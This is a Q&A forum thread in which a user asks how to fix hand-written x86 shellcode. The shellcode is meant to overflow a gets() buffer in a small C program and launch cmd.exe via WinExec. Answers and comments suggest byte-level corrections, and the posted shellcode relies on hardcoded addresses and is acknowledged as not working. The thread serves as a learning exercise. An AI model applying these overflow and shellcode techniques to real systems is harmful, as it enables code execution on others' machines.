1

I have a program like this:

int main() {  
   char buffer[16];
   printf("Write something: ");
   gets(buffer);
   printf("You wrote: %s\n", buffer);
   return 0; 
}

And I have wrote a little bytecode payload, that should launch cmd.exe via WinExec, 

ADD ESP -80      ; 83 C4 80, at 0x0019FF28
XOR EDX, EDX     ; 31 D2   
PUSH EDX         ; 52
PUSH 'd'         ; 6A 64
PUSH 'm'         ; 6A 6D
PUSH 'c'         ; 6A 63    
PUSH  1          ; 6A 01
NOP              ; 90
CALL F0 F7 77 74 ; E8 F0 F7 77 74 = WinExec (0x7477F7F0) 
28 FF 19         ; 28 FF 19 <-- this should be a new return address

So it will fail to execute the code, which is wrong. Any idea how to tweak the code or any idea what should I incorporate into code? And I am not sure whether pushing characters onto stack is also valid. (And yes, it's only a demonstration)

Improve this question

2 Answers 2

Reset to default
1

This is what I've came up with: 

63 6D 64       ; "cmd"  <-- 0x19FF28
20             ; \0x14
31 C0          ; XOR EAX, EAX <-- 0x19FF2C
8D 1C E4       ; LEA EBX, [ESP]
88 43 03       ; MOV BYTE PTR DS:[EBX+4], AL
40             ; INC EAX
53             ; PUSH EBX
50             ; PUSH EAX (inc)
E8 74 77 F7 F0 ; CALL 74 77 F7 F0 
19 FF 2C       ; jump back to 0x19FF2C

Takes up 23 bytes, however it needs a tweak on address, where it jumps.

Improve this answer
0

It looks like you are calling WinExec('d', 'm', 'c', 1), since you push each character seperately on the stack.

Instead, you need to push a pointer to the stack that points to cmd\0. In other words, you push the address of the c in cmd\0, where \0 is the null-byte.

Improve this answer
3
  • Hmm, but that would require to add another 10B, which I have no room for, because I have only 20B on stack and 3B for the return address, where it should jump. Commented Apr 5, 2017 at 6:54
  • Maybe you can put your string literal after the return address. Commented Apr 5, 2017 at 6:56
  • If I think about it, I don't really need the first instruction at all, right? I am not popping from stack anything, so I could trim three bytes there. Commented Apr 5, 2017 at 7:02

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.